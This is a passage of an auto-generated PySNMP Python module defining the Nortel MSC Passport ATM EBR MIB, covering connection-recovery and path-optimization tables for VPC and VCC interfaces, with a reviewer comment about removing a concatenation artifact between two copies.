mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=
mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=
mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=
mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=
mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=
mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=
mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=
mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=
mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=
mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=
mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=
mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=
mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=
mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=
mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry
=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=
mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=
mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=
mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=
mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=
mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=
mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=
mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,
mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,
mscAtmIfVptPnniEbrTotalConnectionRecoveries=
mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=
mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=
mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=
mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=
mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=
mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=
mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=
mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=
mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=
mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=
mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=
mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=
mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=
mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=
mscAtmIfVptVccSrcEbrOvComponentName,
mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,
mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,
mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,
mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,
mscAtmIfUniEbrEligibleRecoveredConnections=
mscAtmIfUniEbrEligibleRecoveredConnections,
mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,
mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,
mscAtmIfIispEbrEligibleRecoveredConnections=
mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=
mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=
mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=
mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=
mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=
mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=
mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=
mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=
mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=
mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=
mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=
mscAtmIfPnniEbrConnectionRecovery,
mscAtmIfVccEbrInfoConnectionRecovered=
mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=
mscAtmIfVccEbrInfoStatsEntry,
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,
mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,
mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,
mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,
mscAtmIfVccSrcEbrOvRecoverySubscribed=
mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=
atmEbrCapabilities, mscAtmIfUniEbrComponentName=
mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=
mscAtmIfPnniEbrTotalPathOptimizations,
mscAtmIfUniEbrIneligibleRecoveredConnections=
mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=
mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=
mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=
mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=
mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=
mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=
mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=
mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=
mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,
mscAtmIfVccEbrInfoOptimizationSubscribed=
mscAtmIfVccEbrInfoOptimizationSubscribed,
mscAtmIfVptVccSrcEbrOvRowStatusTable=
mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,
mscAtmIfVptVccEbrInfoRecoverySubscribed=
mscAtmIfVptVccEbrInfoRecoverySubscribed,
mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,
mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,
mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,
mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,
mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,
mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,
mscAtmIfIispEbrIneligibleRecoveredConnections=
mscAtmIfIispEbrIneligibleRecoveredConnections,
mscAtmIfVptIispEbrConnectionRecovery=
mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=
mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,
mscAtmIfVptIispEbrTotalConnectionRecoveries=
mscAtmIfVptIispEbrTotalConnectionRecoveries,
mscAtmIfUniEbrTotalPathOptimizations=
mscAtmIfUniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvRecoverySubscribed=
mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=
mscAtmIfVptPnniEbrOperTable,
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,
mscAtmIfVptUniEbrEligibleRecoveredConnections=
mscAtmIfVptUniEbrEligibleRecoveredConnections,
mscAtmIfVpcEbrInfoOptimizationSubscribed=
mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=
mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=
mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=
mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=
mscAtmIfVptVccSrcEbrOvStorageType,
mscAtmIfVptPnniEbrTotalPathOptimizations=
mscAtmIfVptPnniEbrTotalPathOptimizations,
mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,
mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,
mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,
mscAtmIfVptVccSrcEbrOvRecoverySubscribed=
mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=
mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,
mscAtmIfVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVccEbrInfoTotalConnectionRecoveries)
# ---- NOTE(review): an invalid stray token (a file-concatenation artifact) was
# removed here; it separated two generated copies of this MIB module and made
# the file unparseable as Python. ----
#
# PySNMP MIB module Nortel-MsCarrier-MscPassport-AtmEbrMIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-AtmEbrMIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:19:41 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex, mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex", "mscAtmIfVptIndex", "mscAtmIfVcc", "mscAtmIfVptVccIndex", "mscAtmIfVpc", "mscAtmIfVptVcc", "mscAtmIfVccIndex", "mscAtmIfVpcIndex")
mscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIisp", "mscAtmIfVptIisp", "mscAtmIfVptIispIndex", "mscAtmIfIispIndex")
mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex, mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrc", "mscAtmIfVptVccSrcIndex", "mscAtmIfVccSrcIndex", "mscAtmIfVptVccSrc", "mscAtmIfVpcSrcIndex", "mscAtmIfVccSrc")
mscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex", "mscAtmIfPnniIndex", "mscAtmIfPnni", "mscAtmIfVptPnni")
mscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUni", "mscAtmIfUni", "mscAtmIfUniIndex", "mscAtmIfVptUniIndex")
Counter32, DisplayString, Gauge32, StorageType, RowStatus = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "Counter32", "DisplayString", "Gauge32", "StorageType", "RowStatus")
NonReplicated, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "NonReplicated")
mscPassportMIBs, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscPassportMIBs")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress, Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "ObjectIdentity", "ModuleIdentity", "Bits", "Counter32", "IpAddress", "Gauge32", "NotificationType", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Unsigned32", "Counter64", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Root OID of the Nortel-MsCarrier-MscPassport-AtmEbrMIB module.
atmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))

# --- mscAtmIfVpcSrcEbrOv subtree: per-VPC-source EBR override objects ---
# "Ebr" here covers the connection-recovery / path-optimization feature
# (see the ...RecoverySubscribed / ...OptimizationSubscribed columns below).
mscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2))

# Row-status table: row creation/deletion plus housekeeping columns,
# indexed by AtmIf / Vpc / VpcSrc / EbrOv indices.
mscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
# Writable row status: rows of this override table can be created/deleted.
mscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
# NonReplicated index column (not accessible; used only for row indexing).
mscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')

# Provisioning table: writable yes/no subscription flags, both defaulting
# to 'yes' (the .clone('yes') at the end of each column's type spec).
mscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# --- mscAtmIfVpcEbrInfo subtree: per-VPC operational EBR information ---
# Unlike the ...SrcEbrOv tables, everything here (including RowStatus) is
# read-only: rows reflect state reported by the device, not provisioning.
mscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11))

# Row-status table, indexed by AtmIf / Vpc / EbrInfo indices.
mscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')

# Operational table (branch 30): read-only yes/no state flags.
mscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')

# Statistics table (branch 40): read-only Counter32 totals.
mscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfVccSrcEbrOv subtree: per-VCC-source EBR override objects ---
# Structurally identical to the VPC variant above, but rooted under the
# Vcc branch (114, 5, 8, 2) and indexed by VCC rather than VPC indices.
mscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2))

# Row-status table with writable RowStatus (rows can be created/deleted).
mscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')

# Provisioning table: writable yes/no subscription flags, default 'yes'.
mscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# --- mscAtmIfVccEbrInfo subtree: per-VCC operational EBR information ---
# Mirrors mscAtmIfVpcEbrInfo but under the Vcc branch (114, 5, 12);
# all columns including RowStatus are read-only (device-reported state).
mscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12))

# Row-status table, indexed by AtmIf / Vcc / EbrInfo indices.
mscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
